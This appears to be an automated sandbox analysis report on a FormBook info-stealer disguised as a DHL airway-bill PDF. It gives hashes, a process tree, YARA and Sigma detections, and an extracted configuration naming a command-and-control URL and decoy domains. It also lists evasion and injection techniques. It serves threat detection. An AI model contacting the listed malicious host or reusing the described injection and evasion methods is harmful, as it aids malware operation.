Play interactive tour

Edit tour

Windows Analysis Report DHL AWB# 4AB19037XXX.pdf.exe

Overview

General Information

Sample Name:	DHL AWB# 4AB19037XXX.pdf.exe
Analysis ID:	491716
MD5:	690684b6b6a432ef5f8b34b67653d4be
SHA1:	34b072cdd785e0be9bf9717707a72c122ebf8e93
SHA256:	2ea667119c0aeda764dcb53a2adf480a26985bfc682949d0fb0c02d266342c68
Tags:	DHLexeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses an obfuscated file name to hide its real file extension (double extension)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

DHL AWB# 4AB19037XXX.pdf.exe (PID: 4532 cmdline: 'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe' MD5: 690684B6B6A432EF5F8B34B67653D4BE)

conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegAsm.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autoconv.exe (PID: 5456 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)

chkdsk.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dependablelawnsnow.com/o4um/"], "decoy": ["kagami-belt.com", "k7e.xyz", "slowcontentmarketing.com", "nativeamericannurse.com", "stadtquartier.xyz", "vietlinkmart.com", "numisme.xyz", "lypp-sh.com", "walkerwaughray.com", "homerightsolutions.com", "vpdd.top", "857741.com", "informednewsreader.com", "misachoavien.com", "aslanrefinedhomes.com", "bjhaitaoshop.com", "lb-fo.com", "shadedfaetattoos.com", "tallulahapp.com", "amhonlinemarketing.com", "rotatingenergy.com", "alabeocopra.quest", "clublebron.com", "maximumbahis240.com", "muskegostorageco.com", "arendayouaccfb.online", "zjgker.com", "crux-at.com", "printsofthecitypgh.com", "rishisinghlaw.com", "thera.xyz", "winiarnia.net", "qq8.space", "houseofidiots.com", "motherhood-diaries.com", "asasaul.top", "3dotshub.com", "laliinparfumeri.com", "raywhiteinc.com", "lighterthanlight.net", "themshirt.com", "falbkugel.quest", "francissoba.com", "shopgraciadivina.com", "wakelust.online", "thatsthailand.com", "beeosum.com", "anushreehomemadeproducts.online", "gzmeijuan.com", "wipegorgeous.com", "nexteventtnpasumo3.xyz", "molitransport.com", "aquitemtijolo.com", "noun-bug.com", "myopportunity.online", "supermuschina.com", "thepatrioteffect.com", "zioholdings.com", "gordonhalecpas.com", "vestindocomamor.com", "redrockaccommodation.online", "thepostres.online", "hometech-bosch.xyz", "indowinjp.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9040:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x93da:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x150ed:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14bd9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x151ef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15367:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9df2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13e54:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xab6a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a5df:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b692:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17511:$sqlite3step: 68 34 1C 7B E1 0x17624:$sqlite3step: 68 34 1C 7B E1 0x17540:$sqlite3text: 68 38 2A 90 C5 0x17665:$sqlite3text: 68 38 2A 90 C5 0x17553:$sqlite3blob: 68 53 D8 7F 8C 0x1767b:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x50b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4ba1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x51b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x532f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3e1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa5a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb65a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x74d9:$sqlite3step: 68 34 1C 7B E1 0x75ec:$sqlite3step: 68 34 1C 7B E1 0x7508:$sqlite3text: 68 38 2A 90 C5 0x762d:$sqlite3text: 68 38 2A 90 C5 0x751b:$sqlite3blob: 68 53 D8 7F 8C 0x7643:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xc8f20:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc92ba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd4fcd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xd4ab9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xd50cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xd5247:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc9cd2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd3d34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xcaa4a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xda4bf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xdb572:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xd73f1:$sqlite3step: 68 34 1C 7B E1 0xd7504:$sqlite3step: 68 34 1C 7B E1 0xd7420:$sqlite3text: 68 38 2A 90 C5 0xd7545:$sqlite3text: 68 38 2A 90 C5 0xd7433:$sqlite3blob: 68 53 D8 7F 8C 0xd755b:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.RegAsm.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.RegAsm.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
6.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.RegAsm.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.RegAsm.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xc8650:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc89ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd46fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xd41e9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xd47ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xd4977:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc9402:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd3464:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xca17a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xd9bef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xdaca2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xd6b21:$sqlite3step: 68 34 1C 7B E1 0xd6c34:$sqlite3step: 68 34 1C 7B E1 0xd6b50:$sqlite3text: 68 38 2A 90 C5 0xd6c75:$sqlite3text: 68 38 2A 90 C5 0xd6b63:$sqlite3blob: 68 53 D8 7F 8C 0xd6c8b:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 4 entries

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe' , ParentImage: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe, ParentProcessId: 4532, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3672

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe' , ParentImage: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe, ParentProcessId: 4532, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3672

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.dependablelawnsnow.com/o4um/"], "decoy": ["kagami-belt.com", "k7e.xyz", "slowcontentmarketing.com", "nativeamericannurse.com", "stadtquartier.xyz", "vietlinkmart.com", "numisme.xyz", "lypp-sh.com", "walkerwaughray.com", "homerightsolutions.com", "vpdd.top", "857741.com", "informednewsreader.com", "misachoavien.com", "aslanrefinedhomes.com", "bjhaitaoshop.com", "lb-fo.com", "shadedfaetattoos.com", "tallulahapp.com", "amhonlinemarketing.com", "rotatingenergy.com", "alabeocopra.quest", "clublebron.com", "maximumbahis240.com", "muskegostorageco.com", "arendayouaccfb.online", "zjgker.com", "crux-at.com", "printsofthecitypgh.com", "rishisinghlaw.com", "thera.xyz", "winiarnia.net", "qq8.space", "houseofidiots.com", "motherhood-diaries.com", "asasaul.top", "3dotshub.com", "laliinparfumeri.com", "raywhiteinc.com", "lighterthanlight.net", "themshirt.com", "falbkugel.quest", "francissoba.com", "shopgraciadivina.com", "wakelust.online", "thatsthailand.com", "beeosum.com", "anushreehomemadeproducts.online", "gzmeijuan.com", "wipegorgeous.com", "nexteventtnpasumo3.xyz", "molitransport.com", "aquitemtijolo.com", "noun-bug.com", "myopportunity.online", "supermuschina.com", "thepatrioteffect.com", "zioholdings.com", "gordonhalecpas.com", "vestindocomamor.com", "redrockaccommodation.online", "thepostres.online", "hometech-bosch.xyz", "indowinjp.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: DHL AWB# 4AB19037XXX.pdf.exe	Virustotal: Detection: 33%			Perma Link
Source: DHL AWB# 4AB19037XXX.pdf.exe	ReversingLabs: Detection: 44%

Yara detected FormBook

Show sources

